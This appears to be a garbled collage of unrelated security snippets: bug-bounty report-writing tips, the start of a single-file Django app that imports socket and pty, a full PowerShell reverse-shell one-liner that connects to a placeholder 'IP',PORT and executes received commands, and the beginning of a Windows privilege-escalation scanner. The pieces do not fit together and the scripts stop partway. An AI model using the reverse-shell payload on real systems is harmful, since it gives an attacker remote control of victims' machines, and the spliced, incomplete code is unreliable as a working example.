- Use simple words and avoid complex phrases. Use headings for your report sections.
- Mention whether authentication is required to exploit the issue.
- If authentication is required, state the privilege level needed (admin, guest, etc.), if applicable.
- Provide the URL where the exploit payload is consumed and the parameter or header component that is affected.
- Include the HTTP requests and responses for multi-step bugs.
- Steps to reproduce the issue should ideally be written from the point of view of a user/attacker of the system.
- In the steps to reproduce, avoid jumping directly to the URL/parameter being exploited. Don't write "1. Go to http://example.com/api/v1/something/23/, 2. Change 23 to -1." This gives the reader no context.
- If possible, state what you think the expected output should be and what you see instead.
from distutils.log import error
import sys, socket, os, pty
from django.conf import settings
from django.urls import include, re_path
from django.http import HttpResponse

# Single-file Django app: configure settings in code instead of a settings module.
# ROOT_URLCONF=__name__ tells Django to look for urlpatterns in this same file.
settings.configure(
    DEBUG=True,
    ROOT_URLCONF=__name__
)
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('IP',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
# Usage: findelevate.py C:\Windows\System32\
# Needs sigcheck.exe in path [https://technet.microsoft.com/en-us/sysinternals/bb897441.aspx]
import sys
import os
import glob
import subprocess

# The directory to scan is the first command-line argument.
if len(sys.argv) < 2:
    print("Usage: findelevate.py <PATH>")